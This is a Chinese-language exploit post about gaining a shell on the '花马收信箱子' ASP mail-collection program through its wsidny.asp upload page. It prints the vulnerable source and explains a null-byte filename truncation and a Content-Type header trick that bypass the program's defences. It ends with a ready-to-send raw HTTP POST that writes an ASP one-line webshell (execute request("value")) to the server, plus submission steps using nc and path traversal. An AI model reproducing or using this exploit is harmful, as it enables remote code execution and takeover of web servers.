花马收信箱子Getshell 0day

By:rubbish
特征:login.asp能看到版权,不过有些箱子把这个地址改求了.另外主目录下存在一个wsidny.asp
整套程序过滤什么的灰常的严密,看得出来是专业的安全人士写的,唯一可以利用的地方就在这个wsidny.asp
看代码:
<!-- #include file="conn.asp"-->
<%
    Server.ScriptTimeout = 36000
   PostSize = Request.TotalBytes
if postsize=0 then
response.End()
end if
    BytesRead = 0       
     ReadSize=256
     HeadSize=256
     filename = Request.BinaryRead(ReadSize)
     BytesRead = BytesRead + ReadSize       
    PostData = Request.BinaryRead(PostSize - BytesRead)
    StoreFile(filename)
Function Bytes2bStr(vin)
if lenb(vin) =0 then
        Bytes2bStr = ""
        exit function
end if
 Dim BytesStream,StringReturn
 set BytesStream = Server.CreateObject("ADODB.Stream")
 BytesStream.Type = 2
 BytesStream.Open
 BytesStream.WriteText vin
 BytesStream.Position = 0
 BytesStream.Charset = "gb2312"
 BytesStream.Position = 2
 StringReturn = BytesStream.ReadText
 BytesStream.close
 set BytesStream = Nothing
 Bytes2bStr = StringReturn
End Function
Function StoreFile(filename)
filea=Bytes2bStr(filename)
filea=LCase(filea)
if instr(filea,".")>0 then
fileb=split(filea,".")
num2=ubound(fileb)
if instr("jpg|gif|jpeg|png|bmp",fileb(num2))>0 then
filea=filea
else
filea=filea&".gif"
end if
else
filea=filea&".gif"
end if
Path=server.MapPath(imgFolder&filea)
Set oFileStream = CreateObject ("ADODB.Stream")
  oFileStream.Type = 1
  oFileStream.Mode = 3
  oFileStream.Open
    oFileStream.Write(PostData)
  oFileStream.SaveToFile Path,2
  oFileStream.Close
  Set oFileStream = Nothing
End Function
    Response.Write PostSize
    Response.Write " bytes were read."       
%>没搞懂这个页面是用来干什么的,可能是生成图片破密保的吧.一开始是想本地构造表单直接提交,上传带;的图片马,结果因为是Request.BinaryRead取的数据,所以urlencode过的参数都取不出来.改用vbs发包.这里又有个问题,因为路径是取的前256个字符,超过了后面server.MapPath所支持的最大长度,于是想到了用\00截断,把vbs发送的http请求抓出来,用ue写截断,然后提交,去掉包含文件测试成功.但是带包含的时候还报错.因为前面的conn.asp包含了一个fsql.asp防注页面,检查了request.form,调用了request.form之后就不能再调用Request.BinaryRead了否则会报错.那这个页面的意义何在?
在这里纠结了好久,试着去掉http头里的Content-Type: application/x-www-form-urlencoded,提交,发现竟然上传成功鸟,这才发现自己以前一直SB了.去掉这一个头,iis就会认为没有用表单格式提交的参数,这样用request.form就不会收到任何数据,也就不会跟后面的Request.BinaryRead冲突了
下面发利用方法:
POST /DNFZONX/wsidny.asp HTTP/1.1
Accept-Language: zh-cn
Content-Length: 284
Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-silverlight, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: xxx.fuck.com
Connection: Keep-Alive
a.asp aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<%execute request("value")%>
一句话代码前面要构造到256个字符,然后在ue里面把空格用\00代替,改下主机头啥的,NC提交,看到返回xxx bytes were read.的话,就成功了,目标文件夹下img/a.asp就是了,如果图片目录找不到或者不可执行啥的,可以用../什么的跳出来就好了,只要保证一句话前面刚好有256个字符就是了
本地测试成功.